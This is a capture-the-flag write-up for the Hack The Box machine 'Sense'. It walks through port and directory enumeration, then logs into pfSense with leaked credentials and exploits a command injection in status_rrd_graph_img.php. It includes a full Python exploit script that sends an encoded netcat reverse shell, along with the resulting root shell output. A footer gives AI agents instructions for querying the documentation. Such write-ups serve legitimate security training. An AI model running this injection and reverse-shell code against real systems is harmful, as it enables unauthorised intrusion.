# Sense

![](/files/0LWl1jLdmE2aI8vBkBfD)

## Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.60 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.

```
# Nmap 7.92 scan initiated Fri Jan  7 12:40:32 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.069s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

# Nmap done at Fri Jan  7 12:40:58 2022 -- 1 IP address (1 host up) scanned in 26.60 seconds
```

As we see, port *80* *(HTTP)* and port *443* *(HTTPS)* are open. Let's try to obtain more information about the services and versions running on those ports. The following command will scan ports *80* and *443* more in depth and save the result into a file:

> nmap -sC -sV -p80,443 10.10.10.60 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.

```
# Nmap 7.92 scan initiated Fri Jan  7 12:47:19 2022 as: nmap -sCV -p80,443 -oN targeted 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.068s latency).

PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/https?
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan  7 12:47:32 2022 -- 1 IP address (1 host up) scanned in 13.30 seconds
```

Nmap identifies that port *80* redirects to the port *443*. We can also see, that the SSL certificate has no *commonName*. Let's take a look at the website.

![](/files/AUvJeN9TzlUfupR8cCNJ)

We have a pfSense login page. We could try to brute force the credentials or do an SQL injection, but none of those attacks are going to work. In fact, if you try to brute force the login page, the firewall will ban you. Let's try to list `.txt` files and directories with gobuster.

> gobuster dir -u <https://10.10.10.60> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt -k

* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of current **threads**, in this case 200 threads.
* `-x` file **extensions** to search for.
* `-k` skips **TLS** certificate verification.

```
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.60
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt
[+] Timeout:                 10s
===============================================================
2022/01/19 19:43:14 Starting gobuster in directory enumeration mode
===============================================================
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]   
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/changelog.txt        (Status: 200) [Size: 271]                                  
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]   
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]   
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]      
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/] 
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/] 
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]   
/csrf                 (Status: 301) [Size: 0] [--> https://10.10.10.60/csrf/]      
/system-users.txt     (Status: 200) [Size: 106]                                    
/filebrowser          (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]
/%7Echeckout%7E       (Status: 403) [Size: 345]                                     
                                                                                    
===============================================================
2022/01/19 20:16:23 Finished
===============================================================
```

## Exploitation

Gobuster found two interesting `.txt` files. The `/changelog.txt` file, which warns that a vulnerability remains to be fixed. And the `/system-users.txt`, which show us some credentials.

<div align="center"><img src="/files/nc0A6u8SRBPFvNt4o7wR" alt=""></div>

<div align="center"><img src="/files/JNgf0a97FxOunPF81nZQ" alt=""></div>

Let's search for the pfSense default credentials on Google. I found the following [link](https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html#:~:text=The%20default%20credentials%20for%20a,Password), which shows that the default password for the pfSense login page is `pfsense`. Let's try the user `rohit` with the password previously found.

![](/files/mwc5zpdidNdoxnXGf5xn)

And we got in! At this point, I started looking for common exploits on exploit-db.

{% hint style="info" %}
Exploit-DB is a great database of exploits and proof-of-concepts used by penetration testers and vulnerability researchers.

<https://www.exploit-db.com/>
{% endhint %}

And I found a [pfSense *Command Injection* exploit](https://www.exploit-db.com/exploits/43560). If you analyze the exploit, you could see that all the exploit is doing is making a GET request to an specific directory, injecting a command in the URL.

I preferred to exploit this vulnerability manually with a python script. All this script does is logging in with the valid credentials, taking the cookies and the CSRF token, and then doing the GET request with the encoded payload. The payload sends a reverse shell to our machine. The script also uses the `pwn` library which automatically spawn a shell.

```python
from pwn import *
import urllib3
import urllib
import collections
import requests


def def_handler(sig, frame):
    print("\n[!] Quitting...")
    sys.exit(1)

#Ctrl+C
signal.signal(signal.SIGINT, def_handler)

url_login = "https://10.10.10.60/index.php"
payload = ""
command = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 1234 >/tmp/f"

for char in command:
    payload += ("\\" + oct(ord(char)).lstrip("0o"))

url_exploit = "https://10.10.10.60/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"
burp = {'https': 'http://127.0.0.1:8080'} # Proxie

def makeRequest():
    urllib3.disable_warnings()
    s = requests.session()
    s.verify = False

    r = s.post(url_login, proxies=burp)
    
    index = r.text.find('csrfMagicToken')
    csrf_token = r.text[index:index+128].split('"')[-1]

    post_data = {
        "__csrf_magic": csrf_token,
        "usernamefld": "rohit",
        "passwordfld": "pfsense",
        "login": "Login"
    }
    
    login_r = s.post(url_login, data=post_data, proxies=burp)

    exploit_request = s.get(url_exploit, timeout=5)
    
if __name__ == '__main__':

    try:
        threading.Thread(target=makeRequest, args=()).start()
    except Exception as e:
        log.error(str(e))

    shell = listen(1234, timeout=20).wait_for_connection()
    
    shell.interactive()
```

All you have to do is change the IP address in the payload, and run the exploit with python3.

> python3 exploit.py

```
[+] Trying to bind to :: on port 1234: Done
[+] Waiting for connections on :::1234: Got connection from ::ffff:10.10.10.60 on port 25574
[*] Switching to interactive mode
sh: can't access tty; job control turned off
# $
```

And finally, as we got the shell as the root user, all we have to do is reap the harvest and take the flags.

```
# $ whoami
root
# $ cat /home/rohit/user.txt
8721327cc232073b40d27d9c17e7348b
# $ cat /root/root.txt
d08c32a5d4f8c8b10e76eb51a69f1a86
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alfa8sa.gitbook.io/htb-writeups/other-os-machines/sense.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.